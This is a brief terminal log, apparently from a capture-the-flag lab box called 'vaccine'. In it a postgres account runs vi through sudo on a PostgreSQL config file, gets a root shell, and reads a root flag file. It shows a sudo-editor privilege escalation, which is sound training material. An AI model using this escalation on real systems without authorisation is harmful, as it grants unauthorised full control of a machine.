postgres@vaccine:~$ sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf

# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# bash
root@vaccine:~# ls
pg_hba.conf  root.txt  snap
root@vaccine:~# cat root.txt
dd6e058e814260bc70e9bbdef2715849
root@vaccine:~#